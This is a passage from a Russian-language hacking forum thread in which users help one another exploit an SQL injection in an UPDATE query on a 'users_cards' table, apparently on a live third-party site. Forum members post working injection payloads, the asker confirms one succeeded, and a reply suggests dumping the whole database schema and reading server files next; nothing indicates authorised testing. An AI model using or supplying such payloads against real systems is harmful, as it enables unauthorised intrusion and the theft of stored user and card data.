HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #2091  
Старый 25.10.2017, 00:05
crlf
Guest
Сообщений: n/a
Провел на форуме:
169212

Репутация: 441
По умолчанию

Цитата:
Сообщение от VKAPI  
VKAPI said:

SSH не удалось из за отсутвия опыта серьёзного
https://www.digitalocean.com/commun...e-sshfs-to-mount-remote-file-systems-over-ssh

Цитата:
Сообщение от Octavian  
Octavian said:

АК ЗАПИСАТЬ ЭТО В .HTACCESS ИЗ ГЛАВНОИ ДИРЕКТОРИИ НО СЫЛАЛОСЬ ТОЛЬКО НА ПАПКИ "files". "images"?
https://httpd.apache.org/docs/2.4/mo...html#directory
 
Ответить с цитированием

  #2092  
Старый 26.10.2017, 19:48
foozzione
Guest
Сообщений: n/a
Провел на форуме:
19301

Репутация: 0
По умолчанию

Вопрос, как раскрутить данную скулю? Через sqlmap не выходит, сразу разлогинивает, даже если передавать все заголовки.

Код:
Code:
update users_cards set cardno = ''', name = '' where id_users=65 and id=33
ERROR #1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''', name = '' where id_users=65 and id=33' at line 2
такая же есть с insert
 
Ответить с цитированием

  #2093  
Старый 27.10.2017, 00:09
crlf
Guest
Сообщений: n/a
Провел на форуме:
169212

Репутация: 441
По умолчанию

Если где-то видно name, то можно сделать так:

Код:
Code:
123', name = version() where id_users=65 and id=33 #
где 123 валидный cardno.

Иначе, крутить как error based, вывод ошибок есть. Материалов на эту тему много.
 
Ответить с цитированием

  #2094  
Старый 27.10.2017, 00:58
foozzione
Guest
Сообщений: n/a
Провел на форуме:
19301

Репутация: 0
По умолчанию

Цитата:
Сообщение от crlf  
crlf said:

Если где-то видно
name
, то можно сделать так:
Код:
Code:
123', name = version() where id_users=65 and id=33 #
где
123
валидный
cardno
.
Иначе, крутить как error based, вывод ошибок есть. Материалов на эту тему много.
коммент не канает... ни --, ни #
 
Ответить с цитированием

  #2095  
Старый 27.10.2017, 01:01
crlf
Guest
Сообщений: n/a
Провел на форуме:
169212

Репутация: 441
По умолчанию

Цитата:
Сообщение от foozzione  
foozzione said:

коммент не канает... ни --, ни #
Что пишет?
 
Ответить с цитированием

  #2096  
Старый 27.10.2017, 13:11
t0ma5
Guest
Сообщений: n/a
Провел на форуме:
300820

Репутация: 90
По умолчанию

Цитата:
Сообщение от foozzione  
foozzione said:

Вопрос, как раскрутить данную скулю? Через sqlmap не выходит, сразу разлогинивает, даже если передавать все заголовки.
Код:
Code:
update users_cards set cardno = ''', name = '' where id_users=65 and id=33
ERROR #1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''', name = '' where id_users=65 and id=33' at line 2
такая же есть с insert
update users_cards set cardno = '',cardno=version(), name='', name = '' where id_users=65 and id=33
 
Ответить с цитированием

  #2097  
Старый 27.10.2017, 14:00
foozzione
Guest
Сообщений: n/a
Провел на форуме:
19301

Репутация: 0
По умолчанию

Цитата:
Сообщение от crlf  
crlf said:

Что пишет?
Код:
Code:
update users_cards set cardno = '123', name = version() where id_users=65 and id=33 #', name = '' where id_users=66 and id=34
ERROR #1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'name = '' where id_users=66 and id=34' at line 3
 
Ответить с цитированием

  #2098  
Старый 27.10.2017, 14:01
foozzione
Guest
Сообщений: n/a
Провел на форуме:
19301

Репутация: 0
По умолчанию

Цитата:
Сообщение от t0ma5  
t0ma5 said:

update users_cards set cardno = '
',cardno=version(), name='
', name = '' where id_users=65 and id=33
сработало! То есть таким образом я в принципе могу с другой таблицы вывести данные?
 
Ответить с цитированием

  #2099  
Старый 27.10.2017, 14:03
t0ma5
Guest
Сообщений: n/a
Провел на форуме:
300820

Репутация: 90
По умолчанию

Цитата:
Сообщение от foozzione  
foozzione said:

сработало! То есть таким образом я в принципе могу с другой таблицы вывести данные?
да, можно через dios составить схему базы http://forum.sqliwiki.com/showthread.php?tid=39 чтоб одним запросом

насчет файлов не проверял, если file_priv = ON возможно получится читать файлы
 
Ответить с цитированием

  #2100  
Старый 27.10.2017, 14:26
foozzione
Guest
Сообщений: n/a
Провел на форуме:
19301

Репутация: 0
По умолчанию

Цитата:
Сообщение от t0ma5  
t0ma5 said:

да, можно через dios составить схему базы
http://forum.sqliwiki.com/showthread.php?tid=39
чтоб одним запросом
насчет файлов не проверял, если file_priv = ON возможно получится читать файлы
просмотрел ман, все вроде как понятно, но не могу воспроизвести в update это
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ